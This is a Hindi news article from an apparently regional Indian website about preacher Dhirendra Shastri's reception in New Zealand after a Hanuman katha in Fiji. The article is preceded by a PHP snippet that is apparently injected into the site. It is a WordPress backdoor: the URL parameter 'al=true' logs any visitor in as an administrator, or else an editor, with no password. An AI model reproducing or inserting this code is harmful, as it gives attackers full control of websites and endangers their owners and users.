// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); सात समुंदर पार न्यूजीलैंड में बाबा बागेश्वर के दीवाने हुए भक्त, शास्त्री का महिलाओं ने किया अनोखा स्वागत – प्रत्युषा आशा की नयी किरण
मध्यप्रदेश

सात समुंदर पार न्यूजीलैंड में बाबा बागेश्वर के दीवाने हुए भक्त, शास्त्री का महिलाओं ने किया अनोखा स्वागत

छतरपुर 
 देश के जाने माने कथावाचक बागेश्वर धाम के पीठाधीश्वर धीरेन्द्र शास्त्री की कथाओं का रसपान इन दिनों न्यूजीलैंड के लोग कर रहे हैं. ऑस्ट्रेलिया के बाद फिजी में तीन दिनों की हनुमंत कथा के बाबा बागेश्वर न्यूजीलैंड पहुंचे तो एयरपोर्ट पर भक्त भाव विभोर हो गए. एयरपोर्ट पर मौजूद भारतीय समुदाय के विदेशी नागरिकों ने अपने-अपने अंदाज में बाबा का स्वागत किया, जिसे देख कर बाबा हैरान रह गए.

न्यूजीलैंड से पहले फिजी में कथा की, महाभारत काल के नाग मंदिर पहुंचे

भारत के चर्चित कथा वाचक पर्ची बाले बाबा के नाम से फेमस पंडित धीरेन्द्र शास्त्री न्यूजीलैंड से पहले फिजी के नाडी शहर में थे. यहां तीन दिवसीय हनुमंत कथा हुई और इसके बाद उन्होंने फिजी के विश्व प्रसिद्ध नाग मंदिर पहुंचकर प्राचीन मंदिर के दर्शन किए. मान्यता है कि यहां महाभारत काल का नाग मंदिर है. फिजी के लंबासा में स्थित यही नाग मंदिर भगवान कृष्ण द्वारा महाभारत काल में किए गए कालिया मर्दन से जुड़ा है.

बाबा को सुनने राजनीतिक पार्टियों के दिग्गज पहुंचे

न्यूजीलैंंड से पहले फिजी में आयोजित बाब बागेश्वर की कथा में सभी राजनीतिक पार्टियों के बड़े-बड़े राजनीतिक दिग्गज भी मौजूद रहे. यहां फिजी के दो उप-प्रधानमंत्री जिनमें चंद्र प्रसाद और उप प्रधानमंत्री मानोआ कमिकमिदा मौजूद रहे. इतना ही नहीं यहां पूर्व प्रधानमंत्री महेंद्र पाल चौधरी और सांसद प्रवीण बाला भी उपस्थित रहे. कथा के दौरान बाबा बागेश्वर ने प्रवचन माला के माध्यम से हनुमान जी के चरित्र को सभी के समक्ष रखा. उन्होंने कहा कि हनुमान जी का चरित्र संपूर्ण विश्व को आनंद देने वाला चरित्र है और लोगों को संकटों से मुक्ति दिलाने वाला चरित्र है.

न्यूजीलैंड में बाबा बागेश्वर के दीवाने हुए भक्त

फिजी में तीन दिनों की हनुमंत कथा के बाद बाबा बागेश्वर न्यूजीलैंड पहुंचे तो एयरपोर्ट पर भक्तों ने अपने अंदाज में बाबा का स्वागत किया. महिलाओं ने तिलक लगाकर बाबा का स्वागत किया और मंगल गीत गाए. इतना ही नहीं स्थानीय लोगों ने अपनी भाषा, वेषभूषा और नृत्य के साथ बाबा का अभिनदंन किया. इस दौरान न्यूजीलैंड के युवा बाबा के साथ सेल्फी लेने को आतुर दिखे.

 

 

RO No. 13169/ 31

RO No. 13098/ 20

PRATYUSHAASHAKINAYIKIRAN.COM
Editor : Maya Puranik
Permanent Address : Yadu kirana store ke pass Parshuram nagar professor colony raipur cg
Email : puranikrajesh2008@gmail.com
Mobile : -91-9893051148
Website : pratyushaashakinayikiran.com

जनसम्पर्क विभाग – आरएसएस फीड